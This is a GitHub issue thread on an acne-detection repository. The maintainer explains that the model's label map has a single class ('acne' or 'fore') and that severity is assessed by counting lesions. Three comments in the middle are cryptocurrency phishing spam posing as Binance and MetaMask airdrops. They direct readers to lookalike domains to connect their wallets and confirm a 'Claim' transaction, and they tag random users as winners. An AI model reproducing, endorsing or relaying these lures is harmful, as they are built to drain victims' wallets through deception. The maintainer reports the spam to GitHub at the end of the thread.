### ISSUE TITLE
acne.pbtxt

### ISSUE THREAD

**Issue by s-jafarpoor** [wenh06/acne_detection#1]
Hello good time
Thanks for sharing the code
I ran the eval_faster_rcnn_inception_v2.ipynb file and used your pre-trained model that you uploaded to MEGA, I need acne.pbtxt now, can you give it to me?

**Comment by wenh06** [comment]
I left the company one year ago and do not have access to these files now. But there's only one class, so I guess it should be like
```
item {
  id: 1
  name: 'acne'
}
```
or
```
item {
  id: 1
  name: 'fore'
}
```
`fore` is the name in the [original dataset](https://github.com/xpwu95/LDL). We re-labelled a very large proportion of the bounding box labels using [labelImg](https://github.com/tzutalin/labelImg).

**Comment by s-jafarpoor** [comment]
Thanks for the reply
Is there a class or 4 classes?
"mild"; "moderate"; "severe"; "very severe"

**Comment by wenh06** [comment]
For object detection, there's only one class. The severity is assessed based on the number of detected lesions using a so-called Hayashi criterion. The original work that proposed this dataset used some fancy ``soft`` regression method (model). You can try training some classification models, but be careful of overfitting.

**Comment by s-jafarpoor** [comment]
Thanks for the reply

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by clqs803** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @zhangning315827880, @Xifeng2009, @shangdyu, @cwwonggg, @menshen, @aizxin, @Jatom-c

**Comment by Jatom-c** [comment]
你好，我已经收到你的邮件了。       --蔡佳桐

**Comment by minholee-itruck** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @zhiqueen, @boyaq, @RebieKong, @jingcaich, @hetian9288, @Dcatfly, @edwinyao121

**Comment by s-jafarpoor** [comment]
what is this? I didn't notice it

**Comment by wenh06** [comment]
I've reported cryptocurrency abuse to GitHub. You can just ignore it.
